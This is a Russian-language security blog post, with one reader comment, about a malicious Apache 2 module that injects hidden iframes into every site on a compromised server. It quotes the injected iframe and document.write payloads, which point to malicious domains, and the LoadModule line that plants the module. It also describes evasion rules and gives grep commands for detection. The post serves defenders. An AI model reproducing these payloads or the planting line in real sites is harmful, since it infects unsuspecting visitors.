Вредоносный модуль Apache внедряет iframe

Всё чаще и чаще появляются сообщения от администраторов и вебмастеров, которые не могут найти источник внедрения вредоносного кода в их сайты. Они меняют пароли, закрывают уязвимости в своих скриптах, производят постоянный мониторинг, но вредоносный код появляется снова и снова.

Суть атаки

Эта атака выводит вредоносный iframe-код при определенных условиях на ВСЕХ сайтах скомпрометированного сервера. Типичный  iframe-код для веб-страниц выглядит следующим образом:

<style>.tlqvepxi { position:absolute; left:-1648px; top:-1752px}</style> 
<div><iframe src="http://matisere.com/21234443.html" width="581" height="476"></iframe></div>

А для .js файлов:

document.write('<style>.hmfabv9 { position:absolute; left:-1141px; top:-1518px} </style> 
<div><iframe src="http://sepatch.org/35204443.html" width="122" height="202"></iframe></div>');

 Вредоносный модуль Apache

Оказалось, что все пострадавшие размещались на веб-серверах Apache 2 версии. В частности, были вредоносными модули Apache — .so, которые выводили вредоносные iframe. Так, в некоторых случаях имена этих модулей были mod_spm_headers.so, mod_spm_mem.so, mod_log.so и mod_security.so.

Располагались они по пути  /usr/lib/httpd/modules или /usr/lib64/httpd/modules или же рядом с обычными модулями Apache.
В httpd.conf заносилась следующая строка:

LoadModule spm_headers_module modules/mod_spm_headers.so

Иногда эта строка подключалась из дополнительного conf-файла.

Осложнялось всё тем, что эти модули имели дату изменения такую же, как и другие файлы, ну и, конечно, неприметными названиями вредоносных модулей.

Найти эти вредоносные модули помогут команды:

ls *.so | xargs strings | grep «module switcher»
или
ls *.so | xargs strings | grep dlEngine

 Механизмы атаки

Вредоносный модуль имеет ряд сложных правил. Таких, как:

  1. Iframe выдаётся только уникальным пользователями (проверка по IP и Cookeis)
  2. Возможность заражать только тех пользователей, которые пришли с поисковых систем
  3. Iframe не выдаётся поисковым ботам,  мобильным браузерам, пользователям linux и mac, локальным IP, администраторам и вебмастерам (на основе заранее составленных правил)

Также модуль имеет динамическую возможность изменения iframe-кода, шифрование строк, кэша и трафика.

Модуль работает с ответами сервера, которые содержат text/html, javascript или же text/js.

В заключении стоит отметить, что злоумышленники действуют всё изощренней. Теперь они не просто взламывают FTP и конкретные сайты, а получают права ROOT на сервере и добавляют, например, свои вредоносные модули.

Исходный код одной из старых версий вредоносного модуля можно посмотреть тут:

http://pastebin.com/6wWVsstj

В рубрике: Malware, Статьи.

Один комментарий к записи Вредоносный модуль Apache внедряет iframe

  1. Владислав написал:

    Спасибо, очень полезная информация, помогла в удалении левых модулей на одном из серверов клиента

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *